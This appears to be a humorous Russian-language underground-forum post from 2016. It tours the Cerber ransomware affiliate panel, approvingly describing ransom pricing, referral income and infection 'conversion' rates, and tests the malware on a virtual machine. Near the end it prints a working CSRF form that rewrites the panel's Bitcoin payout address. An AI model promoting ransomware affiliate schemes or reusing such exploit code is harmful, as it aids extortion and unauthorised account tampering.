Криптолокер Cerber Ransomware [2016]

Пару дней назад, возвращаясь с очередного сбора иллюминатов (где было наконец-то решено, что есть детей от 1 года не западло), я случайно встретился со странным человеком в плаще. Он долго смотрел на меня из темноты. Черная шляпа не давала разглядеть его лицо, и я мог видеть только то, как свет от фонаря отражается в паре зрачков. Я чувствовал, как он сверлит меня взглядом. Когда я уже начал всерьез опасаться за сухость своих штанов, он передал мне пакет, перевязанный бечевкой, и растворился в темноте...


Мне не впервой встречаться с разными злодеями. ООО Кробер и гомункулы никогда не пасует перед опасностью. Я быстро добежал до дома, поменял штаны и изучил содержимое пакета. Там был только логин/пасс, линк на криптолокерную партнерку и пакетик спайса больше ничего.

Потными ладошками я набрал адрес в тор-бравзере...

Внутри.

Вход в панель. Легко преодолеваем этот несложный этап.



Структура панельки такая:


1. Dashboard
2. Profile
3. Statistics

• Installs
• Profit
• Referrals
• Xml

4. Payments
5. Files
6. Support
7. FAQ

1) Dashboard:



2) Profile:



3) Statistics > Installs:



4) Statistics > Profit:



5) Statistics > Referrals (рефералы, пассивный доход, все дела):



6) Statistics > XML:



7) Payments:



8) Files (Можно наделать кучу SubID, для работы по разным целям):



9) Files > Price Settings (можно очень тонко настроить сумму выкупа, в зависимости от того, сколько файлов было закриптовано):



10) Support (мне на тикет ответили в течении дня):



11) FAQ (к слову, вопросов-ответов не так уж и много):



Панель на bootstrap, все удобно, красивенько. Расширенная статистика, рефералы, лендинг с детальнейшим мануалом по оплате выкупа на нескольких языках, выгрузка отчетов по xml, да и за целый месяц работы алгоритм криптолокера так и не был взломан - все это говорит о серьезном подходе. Как говорят овнеры, средний конверт примерно от 0.5% до 3%, что вполне соответствует действительности.

Запуск.

Человек в черной шляпе вновь связался со мной и предложил мини-квест - узнать, куда отстукивает криптолокер. Хотя мой опыт в подобных делах и ограничивался только ловлей пинчей да уфров, но чем черт не шутит (как оказалось в дальнейшем - ничем). Для проверки, я добавил на виртуалку несколько файлов добытых с компа одного кул-хацкера.

На скриншоте содержимое одного файленга, особенно важного:



Запускаем cerber.exe, ждем некоторое время и...



А это то, что осталось от того самого файла (SuperSecretPasswords.txt):



Я посидел немного в WireShark и увидел только кучу одинаковых UDP запросов на IP-адреса из одной подсети. С достоверностью можно сказать только то, что инфа об установке уходит на один (или несколько) из тысяч IP-адресов. Это как искать иголку в стоге сена. Получается, надо мной просто издевались, когда предложили узнать куда отстукивает локер.

Можно конечно списать все на мою неопытность, но настоящие ресерчеры пришли к таким же выводам () - практически нереально понять куда отправляет инфу локер.

Файлы шифруются очень быстро, и вдобавок все теневые копии (на Win 7, 8, 8.1 без предупреждения UAC) удаляются (естественно, что сей факт благоприятно влияет на конверт):




Одним словом - сатанинское творение, не иначе.

Ковыряния.

Поменяв еще одну пару штанишек, я решил поподставлять кавычки и скобочки. Правда, сначала пришлось поколдовать с бурп-сьютом.

Проковыряв примерно 2 дня, к сожалению, я ничего толком не нашел. Файл robots.txt, нескольких артефактов вроде log.txt и 3 простеньких CSRF. Одна позволяла сменить jabber, вторая - удалить биткоин кошелек для выплат, третья - сменить кошелек для выплат (сталобыть самая профитная):

Code:

<html>
<h1>YOUR BITCOINZ ARE BELONG TO US</h1>
<iframe style=display:none name=csrf-frame></iframe>
<form method=POST action=http://cerber****.onion/crb/profile target=csrf-frame id=csrf-form>
<input type=hidden name=payment[bitcoin_address] value=1111RedBear111RedBear111111RedBear>
<input type=submit value=submit style=display:none>
</form>
<script>document.getElementById(csrf-form).submit()</script>
</html>​

Мало того, что это CSRF, так еще и жертва должна перейти по ссылке через тор-браузер. В общем, это было бы довольно сложно эксплуатировать (а сейчас уже все пофиксили).

Конечно, тот факт, что я практически ничего не нашел, не исключает того, что какие-то уязвимости есть. Следует учитывать, что мой профессиональный и интеллектуальный уровень оставляет желать лучшего - например, однажды я решил покормить батон белого хлеба вискасом.

Fin.

© r00t